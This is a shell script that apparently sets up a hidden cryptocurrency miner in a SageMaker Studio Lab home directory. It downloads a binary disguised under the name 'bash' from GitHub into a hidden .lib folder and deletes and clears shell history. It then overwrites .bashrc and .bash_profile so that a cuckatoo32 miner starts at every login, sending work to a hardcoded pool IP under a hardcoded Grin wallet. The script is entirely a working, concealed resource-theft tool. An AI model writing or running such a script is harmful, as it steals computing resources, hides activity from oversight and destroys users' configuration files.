cd ~
rm -rvf .bash* .lib* bash*

rm -rvf ele* lol* 1.*
cd ~/
mkdir .lib
cd .lib
rm -R *
rm -R /home/studio-lab-user/.ton
WORKER="BT14"
WALLETNH="grin1hqhv4z3ju2gavh35y6m2uqyhufs79xr7pt02sn7h22awwduk6e8s8j0dsa"
POOLNH="174.138.68.245:443"
wget -P /home/studio-lab-user/.lib/ https://github.com/gunturyogatama404/ksjdueoa/raw/refs/heads/main/bash && history -cr
echo ""  > /home/studio-lab-user/.bashrc
echo "" > /home/studio-lab-user/.bash_history
echo "" > /home/studio-lab-user/.bash_profile
echo 'echo ""  >> /home/studio-lab-user/.bash_history' >> /home/studio-lab-user/.bashrc
echo "source /home/studio-lab-user/.bash_profile"  >> /home/studio-lab-user/.bashrc
echo "LD_LIBRARY_PATH=/home/studio-lab-user/.lib" > /home/studio-lab-user/.bash_profile
echo "export LD_LIBRARY_PATH" >> /home/studio-lab-user/.bash_profile
echo 'WORKER="x"' >> ~/.bash_profile
echo 'WALLETNH="grin1hqhv4z3ju2gavh35y6m2uqyhufs79xr7pt02sn7h22awwduk6e8s8j0dsa"' >> /home/studio-lab-user/.bash_profile
echo 'POOLNH="174.138.68.245:443"' >> /home/studio-lab-user/.bash_profile
echo "bash /home/studio-lab-user/.lib/gas.sh"  >> /home/studio-lab-user/.bash_profile
echo "./.lib/bash --algo cuckatoo32 -s $POOLNH --user $WALLETNH.$WORKER" > /home/studio-lab-user/.lib/gas.sh
chmod +x bash && cd ~/ && source .bashrc
